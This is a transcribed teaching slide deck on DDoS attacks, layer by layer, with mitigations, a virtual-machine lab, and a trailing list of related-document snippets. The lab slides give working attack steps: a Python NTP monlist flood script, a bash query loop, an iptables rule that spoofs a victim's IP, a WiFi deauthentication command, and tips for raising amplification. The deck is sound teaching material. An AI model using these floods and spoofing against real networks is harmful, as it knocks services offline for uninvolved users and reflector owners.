DDoS. Artūrs Lavrenovs
|
|
|
- Leslie Potter
- 9 years ago
- Views:
Transcription
1 DDoS Artūrs Lavrenovs
2 What is DDoS? DoS - denial-of-service attack is an attempt to make a machine or network resource unavailable to its intended users. DDoS are DoS attacks sent by two or more sources.
3 DDoS in a nutshell How DDoS works? Consumes any kind of resources required to process legitimate actions How to deal with DDoS? Allocate more resources than size of DDoS attack Try to filter out bad stuff
4 Who are the victims? Anything related to $ - Banks, CC processors, Online payment systems, Insurance/Investment/Financial/Trading companies Political sites Government sites News sites Piracy sites and anti-piracy outfits Game servers Almost any kind of business
5 Which OSI levels are susceptible to DDoS? ALL
6 OSI 1 st level - Physical Shared physical link for example: WiFi, radio, mobile, GPS, satellite Generate radio noise Can use as countersurveillance Price starting from few dozen $ Big devices (>1000$) can cover >1km How to deal with this DDoS? Use radar gun to locate signal source Call responsible agency (they will send a van with antennas on the roof) because it is a serious issue
7 Responsible agency: Latvia VAS Elektroniskie sakari Radiofrekvenču uzraudzības nodaļas Radiokontroles daļa
8 OSI 2 nd level Data Link WiFi (802.11) deauthentication Can disconnect all WiFi users Flood deauthentication packets so nobody can connect (or flood all except yourself) aireplay-ng --deauth a 00:11:22:33:44:55 wlan0 Powerful enough external WiFi card can interfere with clients inside building from outside How to deal? You have to find source and remove it (same as 1 st )
9 OSI 2 nd level Old school: MAC flooding Wired networking with switches Switches maintain MAC table in RAM (limited size), it maps MAC address<->physical ports Attacker floods Ethernet frames with random MAC When MAC tables overflows switch becomes hub and floods traffic out of all ports Not only DoS but also used for packet sniffing Solution - get a better switch Limiting MAC addresses per physical port Managed Switches
10 OSI 3 rd level Volumetric DDoS At this level reside volumetric DDoS Use more bandwidth that available to victim bits per second (bps) Send more packets that can be handled packets per second (pps) Victim has limited bandwidth available (e.g., 100mbps or 1gbs link) when link is saturated packets are getting dropped Including legitimate user packets, service slows down till it has became unusable How to deal with volumetric DDoS? You can't. At least not on your own.
11 OSI 3 rd level Network Spoofing IP At 3 rd level occurs source of the volumetric and other DDoS problems IP spoofing No ISP should allow packets with spoofed IP to leave their network Lots of bad ISPs, mostly in 3 rd world countries and places where are a lot of Internet Can't efficiently filter spoofed IP away from the source, effective only on your edge (BCP38) Volumetric DDoS without IP spoofing is far less efficient and could be filtered
12 OSI 3 rd level Spoofing IP
13 Volumetric DDoS Reflection/Amplification DNS, NTP, SNMP, ICMP reflection Create packets with spoofed victim's IP and send to reflectors Reflectors create response and send it to victim Amplification Response size usually bigger than request size so Amplification happens Increase amplification by crafting requests which generate bigger responses Potential for amplification 10x-100x If you have 1gbps spoofable uplink you can create up to 100gbps attack enough to kill small/medium DC/ISP
14 Volumetric DDoS Old school: Smurf attack ICMP reflection+amplification, packets are sent to network's broadcast IP Not viable attack anymore ISPs are blocking packets sent to broadcast IP
15 Volumetric DDoS DNS amplification DNS queries are short and usually answers are short as well, e.g., 1 IP address for A query Fill domain with some trash entries and query something specific or ANY (not all open resolvers might handle) Fill domain with many A entries (almost all open resolvers should handle) DNS resolver should use TCP if answer >512B long DNSSEC adds cryptographic signatures and keys to publicly visible records Luckily (misconfigured) server count is still low DNS server can be attacked (CPU intensive queries)
16 $ dig wradish.com ANY ;; Truncated, retrying in TCP mode. ; <<>> DiG P1 <<>> wradish.com ANY ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: ;; flags: qr rd ra; QUERY: 1, ANSWER: 10, AUTHORITY: 0, ADDITIONAL: 0 ;; QUESTION SECTION: ;wradish.com. IN ANY ;; ANSWER SECTION: wradish.com. 5 IN TXT "asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf " "asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf asdfasdfasdfasdf" wradish.com. 5 IN TXT "tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy ttttttttttttt" "yyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy tttt" "tttttttttyyyyyyyy tttttttttttttyyyyyyyy tttttttttttttyyyyyyyy" wradish.com. 5 IN TXT "hkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdf hkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfh" "alsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfh alsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhf" "asdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhf asdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfh" "asdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfh asdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdfhkhkhaksdfhasdhfasdfhalsdf" wradish.com. 5 IN TXT "asdfasfwerwer asdfasfwerwer asdfasfwerwer asdfasfwerwer asdfasfwerwer asdfasfwerwer asdfasfwerwer asdfasfwerwer asdfasfwerwer asdfasfwerwer asdfasfwerwer as" "dfasfwerwer asdfasfwerwer asdfasfwerwer asdfasfwerwer asdfasfwerwer asdfasfwerwer asdfasfwerwer asdfasfwerwer asdfasfwerwer asdfasfwerwer " wradish.com. 5 IN TXT "test test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test tests" "ttest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test test test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest" " test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtes" "t test teststtest test test test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest test teststtest tes" "t te" wradish.com. 5 IN MX 10 mailstore1.secureserver.net. wradish.com. 5 IN MX 0 smtp.secureserver.net. wradish.com. 5 IN SOA ns19.domaincontrol.com. dns.jomax.net wradish.com. 5 IN NS ns20.domaincontrol.com. wradish.com. 5 IN NS ns19.domaincontrol.com. ;; Query time: 5 msec ;; SERVER: #53( ) ;; WHEN: Tue May 13 02:48: ;; MSG SIZE rcvd: 3782
17 Why Volumetric DDoS attacks work? Millions of misconfigured/vulnerable network devices DNS 28 million significant threats (May 2014) CloudFlare received 300gbps DDoS (March 2013) NTP Christmas present of 2013 CloudFlare received 400gbps (February 2014) only 4529 vulnerable NTP servers used
18 Volumetric DDoS - mitigation What is most common way to mitigate volumetric DDoS? Null-routing IP (attackers have achieved their goal) ISP/DC have to protect their network and customers How to deal with volumetric DDoS? Have/buy more IP transit and have enough processing power for packets Buy filtered IP transit How to deal with all volumetric DDoS in long run? Remove option to send spoofed IP (filtering on IP transit provider links) (hard) Remove all vulnerable servers (almost impossible)
19 OSI 4 th level - Transport TCP stack implementation requires tables and buffers in RAM allocated by OS SYN flood flood server with TCP SYN packets Send from different spoofed IP and different ports Server creates entry in TCP state table for each SYN packet Maximum entries (IP)2^32*(ports)2^16 takes more memory than available How to deal? Best practice is SYN cookies Proposed future standard TCPCT (solves some SYN cookies issues and instead creates other)
20 OSI 4 th level TCP SYN cookies Do not store SYN in state table SYN cookie = ($t%32)(mss)hash(sip,sp,dip,dp,$t) $t is timestamp with precision of 64 seconds MSS - maximum segment size Send to client SYN/ACK with initial TCP sequence number == SYN cookie Client responds with SYN cookie+1 Server calculates again and if matches establishes TCP session (responds with ACK and adds to TCP state table) Check (set) in Linux # sysctl net.ipv4.tcp_syncookies
21 OSI 4 th level Non amplified volumetric TCP DDoS Smaller than amplified UDP attacks (10xn gbps instead of 100xn gbps) Victim still (cookies don't help) have to reply with SYN/ACK packet if received SYN with spoofed IP Victim have to process all packets as real ones, it requires bandwidth equal to attackers (also high pps) Solution - intelligent analysis, requires a lot of processing power Does IP match some previous data (historical HTTP logs) Block dubious networks (DC, not announced, GEO)
22 OSI 4 th level Reflected TCP DDoS Attackers send SYN packets with spoofed victim's IP to real world servers with TCP services Real world servers send SYN/ACK to victim Fairly easy to deal with Victim (if server) has no reason to receive SYN/ACK Drop all SYN/ACK as far from victim as possible (ISP edge)
23 OSI 5 th level - Session RPC, NFS, PPTP, NetBIOS, etc. Weaknesses in implementations Spoofed IP Session terminations End device overloading Least interesting DDoS
24 OSI 6 th level - Presentation Most common target SSL (especially for $ category) Send lots/malformed SSL requests SSL consumes a lot of CPU cycles Response time decreases till service has become unusable Solution: SSL offloading + IDS/IPS/proprietary filtering systems Potential for DDoS compression Takes CPU cycles + memory Find on-demand compression and put/get as much as You can Solution: limiting and analyzing at 7 th OSI level
25 OSI 7 th level HTTP, FTP, POP, SMTP In case of TCP protocols IP spoofing does not work, You need a botnet Simple HTTP DoS: ab -n c Solution: limit requests in HTTP server or OS firewall HTTP DDoS solution Identify real user used limits Set them in HTTP server/os firewall Big botnet with each IP sending less requests than limit (GEO filters, prolonged logs)
26 OSI 7 th - Slowloris HTTP DDoS Evil client create as many concurrent HTTP connections as possible (lower than FW limitations) Keep connections open as long as possible Periodically send partial requests Multiple evil clients can exhaust HTTP server active connection pool Solution Use HTTP server with huge connection pools (e.g., nginx) Use some security ad-don
27 OSI 7 th + level Web applications residing in a web server Find slow processing parts of web application Usually data creation, deletion, modification Text search, DB LIMIT ,344 Send less requests than limited in 7 th level Find scripts that don't check parameter bounds, example Protection against bots captcha.php?length=5 captcha.php?length= consumes RAM and blocks till timeout (e.g., 60 seconds) 1req/sec blocks 60 PHP processes, 10req/s DDoS
28 IP spoofing before edge filtering Some ISP and DC have implemented IP filtering only on the edge (clients can spoof IP inside network) If network if big enough there are lots of different servers (DNS, NTP, HTTP) You can spoof victim's IP and create reflected DDoS (including TCP) Whole attack will originate from network you are using Easier to filter for victim, easier to notice by reflector network, easier to find attacker
29 Web savior CloudFlare CDN provider data centers across the globe Security includes DDoS protection which can handle biggest attacks Enough bandwidth to handle volumetric attacks Filters all DDoS, including OSI 7 th lvl Cheap 200$/month, previous comparable outsourced services would cost >1000$/mo Much cheaper than handling security yourself (man hours, hardware/software, outsource) if DDoS is eventually expected
30 Why not everyone using CloudFlare? USA company (all your data are available to NSA/FBI/CIA and any other organizations) All your data are handled by 3 rd party Have to give up your SSL certificate (big no-no for $ related sites) Privacy concerns ToS, Legal issues Does not protect network services (only Web) IP sharing (issues in countries/networks which block access to some content)
31 How to DDoS CloudFlare site? Don't waste effort attacking CloudFlare Find huge bug in 7 th+ OSI level which allows to DDoS using very few requests (rare) Volumetric DDoS backend IP, how to find: Use security audit tools to locate backend IP crawls site and searches for pattern for example in error messages (that is why you have to turn off all error reporting) Google for domain IP history, possibly backend is the same
32 How other filtering services work? Buy a lot of bandwidth from big DCs Volumetric DDoS uses download BW DCs have symmetrical links DCs usually are traffic generators (most servers use upload BW) Download BW can be bought at a fraction of the upload BW price Drop UDP, ICMP packets Intelligent TCP filtering Browser stack verification (is JavaScript implemented challenge/response) Statistical filtering (against HTTP flood)
33 DDoS redirection Common scenario botnet (or bought servers) in misconfigured networks queries DNS A record and (create amplified reflected volumetric DDoS) spoof IP accordingly Victim changes A record to suspected attacker, somebody he does not like or some government/military/law enforcement agency DDoS automatically converge to new victim Extremely gray area (possibly illegal) and victim should never do that Redirect attack to some of the attacking reflector nodes (e.g., misconfigured DNS servers)
34 (H-)Activism DDoS New form of protest Against government, big corporations, anyone else who people feel have been attacking their freedoms and interests LOIC (Low Orbit Ion Cannon) free software users choose to install to create TCP/UDP flood When many users launch LOIC to the same target it creates DDoS No reflection/amplification so can be filtered and users can be identified Richard Stallman has stated that DoS is a form of 'Internet Street Protests' Government treats as criminals
35 DDoS economics If attack is not used as form of protest then it is usually carried out by some DDoS service Cheap and small attacks starting 20$/day can break website with no/low protection Average attacks starting 50$/day can break site without protection against volumetric attacks (most average and even big sites) Ordering DDoS usually is cheaper than ordering filtering for victims (already victory for evil) Huge additional competing advantage (e.g., e-shop is down) Almost impossible to identify who is responsible
36 How people order DDoS? Use search engine Select one of many verified offers Get free test (10min) Order by hourly/daily rate (refunds available) Pay using shady online payment systems with high anonymity Never get caught
37 Professional DDoS Complex attack (efficient way is to wait till victim has dealt with issues before moving to next one) Check if weak authoritative NS (self hosted) then flood it Volumetric UDP DDoS Spoofed TCP flood HTTP attack with botnet (usually web stack implemented) Web application attack Dedicated hacker altering attack and analyzing 7 th+ level weaknesses Pricing >=1000$/day If you can counter such you are a rare professional
38 Unintentional DDoS By default most sites are not built and equipped to handle lots of (nx current number of users) legitimate users There are huge sites with millions of users where people post links reddit, slashdot, facebook Link to unprepared site gets posted and legitimate users kill it Web service specifics (usually found unintentionally and then exploited) FaceBook notes generate list of images and add random parameters, FB servers crawl and cache Google Spreadsheets same approach, use formula =image()
39 How banks should handle DDoS? Buy filtered IP transit from reliable and big ISP (SLA) Should be dropped all UDP Should be dropped TCP above SLA requirements Buy (proprietary) DDoS filtering device (a lot of $) with SLA and host on-site Bank signs SSL certificate with their own certificate Clients establish SSL connection with filter (using intermediate certificate) and it decides if client is good SSL session renegotiation with bank's servers Certificate never leaves bank's own servers and sensitive user data are never handled by filter as well Filter drops everything else and should handle 10x gbps of TCP
40 Summary Is UDP bad? Nope. It is actually quite good and useful protocol. Lazy network administrators have not configured their networks against IP spoofing. Is DNS/NTP/(put your protocol here) bad? Still nope. Those are quite useful protocols. Lazy network administrators are to blame Have not updated their server software Have misconfigured servers Commit no security audits Network device (cheap kind) manufacturers. Are You good network administrator?
41 Hands-on volumetric DDoS (discovery, IP spoofing, reflection, amplification) loosely corresponds to actions of actual attackers
42 Virtual Machines
43 Given You have virtual machines Client connect over SSH localhost 2222 Username user password user Victim locate yourself Web server on 80 port Accessible also from 2 reflectors locate yourself NTP servers
44 Warm up Try HTTP DoS using some benchmarking tool Try DoS attack on dynamic content Further details & real tasks in next slides
45 Real Network
46 Hands-on: real local network 1.Locate victim 2.Locate potential attack sources 3.Check attack sources 4.Spoof IP address 5.Create DDoS 6.Increase amplification Our setup: Local network = Internet Subnet /24
47 Hands-on: locate victims and attack sources Use some software to map your local network to find victims For example: nmap Choose one of the found web servers as victim There are 2 types of attack available, multiple sources for both, choose one or both Query and check if attack sources work
48 Hands-on: DNS Query DNS server: # host google.lv # dig google.lv Find queries which generate large responses
49 Hands-on: NTP ntpdate -q $ntp_server ntpdc -nc monlist $ntp_server Check maximum BW (ifstat -b) #!/bin/bash while true; do ntpdc -n -c monlist $ntp_server > /dev/null & done Why so little BW available?
50 import socket Hands-on: NTP Python payload = """\x17\x00\x03\x2a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0 0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0 0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0 0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0 0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x 00\x00\x00\x00\x00""" sock = socket.socket(socket.af_inet, socket.sock_dgram) while True: sock.sendto(payload, (" ", 123))
51 Hands-on: Spoof IP NTP $ sudo iptables -t nat -A POSTROUTING -p udp --dport 123 -j SNAT --to-source $victim_ip All UPD packets with destination port 123 (default for NTP) will be altered and source will be set to $victim_ip IP can be also spoofed using some tools that can create RAW packets, e.g., Scapy, Nemesis
52 Hands-on: create DDoS Launch on multiple PCs Python version (if site still up) Or if you can write program in C/C++ Try to access website (or see if it slows down) measure: # time curl -v $victim
53 Hands-on: increase amplification (NTP) Why small amplification (less than 2x)? monlist response is client list Goal increase client list on server but how? Spoof lots of different IP Send ntpdate -q $ntp_server from each spoofed IP Monlist response maximum client list is 600
54 Hands-on: Virtual Network version If you want to try yourself: ual-network
55 Hands-on: Setting things up NTP apt-get install ntp Edit /etc/ntp.conf restrict mask nomodify notrap service ntp restart
DDoS. Artūrs Lavrenovs
DDoS Artūrs Lavrenovs What is DDoS? DoS - denial-of-service attack is an attempt to make a machine or network resource unavailable to its intended users. DDoS are DoS attacks sent by two or more sources.
Acquia Cloud Edge Protect Powered by CloudFlare
Acquia Cloud Edge Protect Powered by CloudFlare Denial-of-service (DoS) Attacks Are on the Rise and Have Evolved into Complex and Overwhelming Security Challenges TECHNICAL GUIDE TABLE OF CONTENTS Introduction....
CloudFlare advanced DDoS protection
CloudFlare advanced DDoS protection Denial-of-service (DoS) attacks are on the rise and have evolved into complex and overwhelming security challenges. 1 888 99 FLARE [email protected] www.cloudflare.com
Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs
Overview of Network Security The need for network security Desirable security properties Common vulnerabilities Security policy designs Why Network Security? Keep the bad guys out. (1) Closed networks
Guide to DDoS Attacks December 2014 Authored by: Lee Myers, SOC Analyst
INTEGRATED INTELLIGENCE CENTER Technical White Paper William F. Pelgrin, CIS President and CEO Guide to DDoS Attacks December 2014 Authored by: Lee Myers, SOC Analyst This Center for Internet Security
Security of IPv6 and DNSSEC for penetration testers
Security of IPv6 and DNSSEC for penetration testers Vesselin Hadjitodorov Master education System and Network Engineering June 30, 2011 Agenda Introduction DNSSEC security IPv6 security Conclusion Questions
co Characterizing and Tracing Packet Floods Using Cisco R
co Characterizing and Tracing Packet Floods Using Cisco R Table of Contents Characterizing and Tracing Packet Floods Using Cisco Routers...1 Introduction...1 Before You Begin...1 Conventions...1 Prerequisites...1
A1.1.1.11.1.1.2 1.1.1.3S B
CS Computer 640: Network AdityaAkella Lecture Introduction Networks Security 25 to Security DoS Firewalls and The D-DoS Vulnerabilities Road Ahead Security Attacks Protocol IP ICMP Routing TCP Security
Linux Network Security
Linux Network Security Course ID SEC220 Course Description This extremely popular class focuses on network security, and makes an excellent companion class to the GL550: Host Security course. Protocols
DRDoS Attacks: Latest Threats and Countermeasures. Larry J. Blunk Spring 2014 MJTS 4/1/2014
DRDoS Attacks: Latest Threats and Countermeasures Larry J. Blunk Spring 2014 MJTS 4/1/2014 Outline Evolution and history of DDoS attacks Overview of DRDoS attacks Ongoing DNS based attacks Recent NTP monlist
CS 356 Lecture 16 Denial of Service. Spring 2013
CS 356 Lecture 16 Denial of Service Spring 2013 Review Chapter 1: Basic Concepts and Terminology Chapter 2: Basic Cryptographic Tools Chapter 3 User Authentication Chapter 4 Access Control Lists Chapter
CS5008: Internet Computing
CS5008: Internet Computing Lecture 22: Internet Security A. O Riordan, 2009, latest revision 2015 Internet Security When a computer connects to the Internet and begins communicating with others, it is
Abstract. Introduction. Section I. What is Denial of Service Attack?
Abstract In this report, I am describing the main types of DoS attacks and their effect on computer and network environment. This report will form the basis of my forthcoming report which will discuss
CSE 127: Computer Security. Network Security. Kirill Levchenko
CSE 127: Computer Security Network Security Kirill Levchenko December 4, 2014 Network Security Original TCP/IP design: Trusted network and hosts Hosts and networks administered by mutually trusted parties
Denial of Service Attacks
2 Denial of Service Attacks : IT Security Sirindhorn International Institute of Technology Thammasat University Prepared by Steven Gordon on 13 August 2013 its335y13s2l06, Steve/Courses/2013/s2/its335/lectures/malicious.tex,
DDoS Attacks - Peeling the Onion on One of the Most Sophisticated Ever Seen. Eldad Chai, VP Product
DDoS Attacks - Peeling the Onion on One of the Most Sophisticated Ever Seen Eldad Chai, VP Product Incapsula Application Delivery from the Cloud 2 DDoS 101 ISP Network Devices Web servers Applications
TDC s perspective on DDoS threats
TDC s perspective on DDoS threats DDoS Dagen Stockholm March 2013 Lars Højberg, Technical Security Manager, TDC TDC in Sweden TDC in the Nordics 9 300 employees (2012) Turnover: 26,1 billion DKK (2012)
CMPT 471 Networking II
CMPT 471 Networking II Firewalls Janice Regan, 2006-2013 1 Security When is a computer secure When the data and software on the computer are available on demand only to those people who should have access
Reducing the impact of DoS attacks with MikroTik RouterOS
Reducing the impact of DoS attacks with MikroTik RouterOS Alfredo Giordano Matthew Ciantar WWW.TIKTRAIN.COM 1 About Us Alfredo Giordano MikroTik Certified Trainer and Consultant Support deployment of WISP
DNS Best Practices. Mike Jager Network Startup Resource Center [email protected]
DNS Best Practices Mike Jager Network Startup Resource Center [email protected] This document is a result of work by the Network Startup Resource Center (NSRC at http://www.nsrc.org). This document may be
Firewalls. Firewalls. Idea: separate local network from the Internet 2/24/15. Intranet DMZ. Trusted hosts and networks. Firewall.
Firewalls 1 Firewalls Idea: separate local network from the Internet Trusted hosts and networks Firewall Intranet Router DMZ Demilitarized Zone: publicly accessible servers and networks 2 1 Castle and
KAREL UCAP DNS AND DHCP CONCEPTS MANUAL MADE BY: KAREL ELEKTRONIK SANAYI ve TICARET A.S. Organize Sanayi Gazneliler Caddesi 10
KAREL UCAP DNS AND DHCP CONCEPTS MANUAL MADE BY: KAREL ELEKTRONIK SANAYI ve TICARET A.S. Organize Sanayi Gazneliler Caddesi 10 Sincan 06935 Ankara, Turkey Version Table Manual Version/Date AAA/22.03.2011
Seminar Computer Security
Seminar Computer Security DoS/DDoS attacks and botnets Hannes Korte Overview Introduction What is a Denial of Service attack? The distributed version The attacker's motivation Basics Bots and botnets Example
How to launch and defend against a DDoS
How to launch and defend against a DDoS John Graham-Cumming October 9, 2013 The simplest way to a safer, faster and smarter website DDoSing web sites is... easy Motivated groups of non-technical individuals
SECURING APACHE : DOS & DDOS ATTACKS - I
SECURING APACHE : DOS & DDOS ATTACKS - I In this part of the series, we focus on DoS/DDoS attacks, which have been among the major threats to Web servers since the beginning of the Web 2.0 era. Denial
Chapter 8 Security Pt 2
Chapter 8 Security Pt 2 IC322 Fall 2014 Computer Networking: A Top Down Approach 6 th edition Jim Kurose, Keith Ross Addison-Wesley March 2012 All material copyright 1996-2012 J.F Kurose and K.W. Ross,
Steps for Basic Configuration
1. This guide describes how to use the Unified Threat Management appliance (UTM) Basic Setup Wizard to configure the UTM for connection to your network. It also describes how to register the UTM with NETGEAR.
20-CS-6053-00X Network Security Spring, 2014. An Introduction To. Network Security. Week 1. January 7
20-CS-6053-00X Network Security Spring, 2014 An Introduction To Network Security Week 1 January 7 Attacks Criminal: fraud, scams, destruction; IP, ID, brand theft Privacy: surveillance, databases, traffic
Firewall Firewall August, 2003
Firewall August, 2003 1 Firewall and Access Control This product also serves as an Internet firewall, not only does it provide a natural firewall function (Network Address Translation, NAT), but it also
Session Hijacking Exploiting TCP, UDP and HTTP Sessions
Session Hijacking Exploiting TCP, UDP and HTTP Sessions Shray Kapoor [email protected] Preface With the emerging fields in e-commerce, financial and identity information are at a higher risk of being
Protecting and controlling Virtual LANs by Linux router-firewall
Protecting and controlling Virtual LANs by Linux router-firewall Tihomir Katić Mile Šikić Krešimir Šikić Faculty of Electrical Engineering and Computing University of Zagreb Unska 3, HR 10000 Zagreb, Croatia
NTP-AMP: AMPLIFICATION TACTICS AND ANALYSIS
GSI ID: 1070 NTP-AMP: AMPLIFICATION TACTICS AND ANALYSIS RISK FACTOR - HIGH 1.1 OVERVIEW / Amplification is not a new distributed denial of service (DDoS) attack method, nor is the misuse of the Network
1. Firewall Configuration
1. Firewall Configuration A firewall is a method of implementing common as well as user defined security policies in an effort to keep intruders out. Firewalls work by analyzing and filtering out IP packets
Secure Software Programming and Vulnerability Analysis
Secure Software Programming and Vulnerability Analysis Christopher Kruegel [email protected] http://www.auto.tuwien.ac.at/~chris Operations and Denial of Service Secure Software Programming 2 Overview
DISTRIBUTED DENIAL OF SERVICE OBSERVATIONS
: DDOS ATTACKS DISTRIBUTED DENIAL OF SERVICE OBSERVATIONS 1 DISTRIBUTED DENIAL OF SERVICE OBSERVATIONS NTT is one of the largest Internet providers in the world, with a significant share of the world s
VALIDATING DDoS THREAT PROTECTION
VALIDATING DDoS THREAT PROTECTION Ensure your DDoS Solution Works in Real-World Conditions WHITE PAPER Executive Summary This white paper is for security and networking professionals who are looking to
CYBER ATTACKS EXPLAINED: PACKET CRAFTING
CYBER ATTACKS EXPLAINED: PACKET CRAFTING Protect your FOSS-based IT infrastructure from packet crafting by learning more about it. In the previous articles in this series, we explored common infrastructure
How To Understand A Network Attack
Network Security Attack and Defense Techniques Anna Sperotto (with material from Ramin Sadre) Design and Analysis of Communication Networks (DACS) University of Twente The Netherlands Attacks! Many different
DDoS Protection on the Security Gateway
DDoS Protection on the Security Gateway Best Practices 24 August 2014 Protected 2014 Check Point Software Technologies Ltd. All rights reserved. This product and related documentation are protected by
This Lecture. The Internet and Sockets. The Start 1969. If everyone just sends a small packet of data, they can all use the line at the same.
This Lecture The Internet and Sockets Computer Security Tom Chothia How the Internet works. Some History TCP/IP Some useful network tools: Nmap, WireShark Some common attacks: The attacker controls the
Network Traffic Analysis
2013 Network Traffic Analysis Gerben Kleijn and Terence Nicholls 6/21/2013 Contents Introduction... 3 Lab 1 - Installing the Operating System (OS)... 3 Lab 2 Working with TCPDump... 4 Lab 3 - Installing
BASIC ANALYSIS OF TCP/IP NETWORKS
BASIC ANALYSIS OF TCP/IP NETWORKS INTRODUCTION Communication analysis provides powerful tool for maintenance, performance monitoring, attack detection, and problems fixing in computer networks. Today networks
Firewall implementation and testing
Firewall implementation and testing Patrik Ragnarsson, Niclas Gustafsson E-mail: [email protected], [email protected] Supervisor: David Byers, [email protected] Project Report for Information
DNS amplification attacks
amplification attacks Matsuzaki Yoshinobu 2006/04/25 Copyright (C) 2006 Internet Initiative Japan Inc. 1 amplification attacks Attacks using IP spoofed dns query generating a traffic overload
Cryptography and network security
Cryptography and network security Firewalls slide 1 Firewalls Idea: separate local network from the Internet Trusted hosts and networks Firewall Intranet Router DMZ Demilitarized Zone: publicly accessible
DDoS Attacks & Mitigation
DDoS Attacks & Mitigation Sang Young Security Consultant [email protected] 1 DoS Attack DoS & DDoS an attack render a target unusable by legitimate users DDoS Attack launch the DoS attacks from various
How To Attack Isc.Org.Org With A Dnet On A Network With A Pnet On The Same Day As A Dbus On A Pc Or Ipnet On An Ipnet.Org On A 2.5Th Gen.Net
Surviving a DDoS Attack: What every host needs to know Maria Karaivanova, Business Development David Koston, Platform www.cloudflare.com DDoS Attacks are becoming massive, and easier to initiate!2 Major
Practical Advice for Small and Medium Environment DDoS Survival
Practical Advice for Small and Medium Environment DDoS Survival Chris "Mac" McEniry Sony Network Entertainment @macmceniry November 8 13, 2015 Washington, D.C. www.usenix.org/lisa15 #lisa15 1 Practical
Local DNS Attack Lab. 1 Lab Overview. 2 Lab Environment. SEED Labs Local DNS Attack Lab 1
SEED Labs Local DNS Attack Lab 1 Local DNS Attack Lab Copyright c 2006 Wenliang Du, Syracuse University. The development of this document was partially funded by the National Science Foundation s Course,
Track 2 Workshop PacNOG 7 American Samoa. Firewalling and NAT
Track 2 Workshop PacNOG 7 American Samoa Firewalling and NAT Core Concepts Host security vs Network security What is a firewall? What does it do? Where does one use it? At what level does it function?
Firewalls. Chapter 3
Firewalls Chapter 3 1 Border Firewall Passed Packet (Ingress) Passed Packet (Egress) Attack Packet Hardened Client PC Internet (Not Trusted) Hardened Server Dropped Packet (Ingress) Log File Internet Border
Automated Mitigation of the Largest and Smartest DDoS Attacks
